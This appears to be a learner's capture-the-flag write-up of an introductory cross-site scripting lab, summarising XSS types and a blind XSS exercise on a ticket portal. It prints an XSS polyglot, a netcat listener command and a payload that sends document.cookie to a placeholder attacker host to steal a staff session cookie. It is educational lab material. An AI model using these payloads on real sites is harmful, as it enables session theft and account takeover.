Intro to Cross-site Scripting

We get an explaination of XSS and some examples of different types of XSS attacks e.g. a Proof of Concept, Session Stealing, Key Logger, Business Logic.

We then learn a bit about Reflected XSS, and how to test for it e.g.

  • Parameters in the URL Query String

  • URL File Path

  • Sometimes HTTP Headers (although unlikely exploitable in practice)

Next we learn about Stored XSS attacks and that these can be things like comments on a blog, user profile information or website listings. Next is DOM Based XSS which requires a lot more knowledge and skill as well as Blind XSS attacks which which is similar to stored XSS attacks but you can't see the payload working or be able to test it against yourself first.

We then go onto the next section called 'Perfecting Your Payload' where we go through some different XSS attacks and how we can get escape out of different things e.g. inputs, text areas, JS code etc.

Most important we learn about the XSS Polygot which allows us to test for all of these with a single line of code. 

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e

In the final section we need to execute a blind XSS attack on a customer ticket portal.

We start by making an account and creating a ticket, once we view the ticket we notice that it uses a text area to edit the contents. We create a new ticket and escape the text area like so </textarea>test, we can try this with an alert() to see if it works and as expected it does.

Next we learn about Netcat and how to set it up to listen to a specific port which we do with the following command where -n allows us to discover errors, -l puts netcat on listening mode, -v is verbose mode and -p allows us to specify the port which is 9001 for us.

nc -n -l -v -p 9001

We then get provided with a payload to use which looks like this;

</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script

As well as a breakdown of what it does and how it works;

Breakdown of the payload

We can then create another ticket and use the payload in the ticket body after we have updated the payload to use out Attackbox IP and the port number.

Once we open the ticket this is the output we get from Netcat;

Netcat output

We can then take the cookie value and base64 decode it to get the value of the staff-session cookie which is our flag for this task.

PreviousIntro to SSRFNextCommand Injection

Last updated